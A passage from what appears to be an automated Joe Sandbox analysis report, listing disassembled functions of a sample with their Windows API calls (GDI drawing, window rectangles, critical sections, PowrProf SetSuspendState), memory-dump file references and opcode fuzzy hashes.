                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 1517587568-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction ID: 398bc34aaeb48a28786a3eeef8d096b9ba9882d646282afc346b5bddce66a1f9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 116e8130f725741a0df8cffd76ef37318a9139d2394634156b2cf1340f76da15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36417E32200A048FD724EFA9E884E6BF3A5EF94321B05852FE84A97611DB35F840CB55
                                                                                                                                                                                                                                                                                    Function 0041E180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                    • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                    Function 004657C0 Relevance: 7.6, APIs: 5, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,113262B6,00093C38,?,?,?,?,00000000,0047812F,000000FF,0041A4F1,113262B6,00093C38), ref: 00465814
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1337965791-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 17216591ef9b180b25b2aa9ddde3603ed2100cc8580b4b92498784189749eb6b
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17216591ef9b180b25b2aa9ddde3603ed2100cc8580b4b92498784189749eb6b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                    Function 00454C60 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aullrem$__aulldiv
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3670715282-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction ID: fa94849079e70c1b34915df37323d6afc94868806176a113829b563514bd0fbf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34d576a32de794e1e0b0d0fca0d0e7c205ee0b047ab4e09ce85ba4a67a3df8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43311775208305AFD200EA65E881D2FB3E9EBC8749F50491EF98497302D738FD498AB6
                                                                                                                                                                                                                                                                                    Function 0040F280 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                    Function 0046CF70 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                    • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                    Function 00416430 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                    Function 00401220 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 0040122D
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
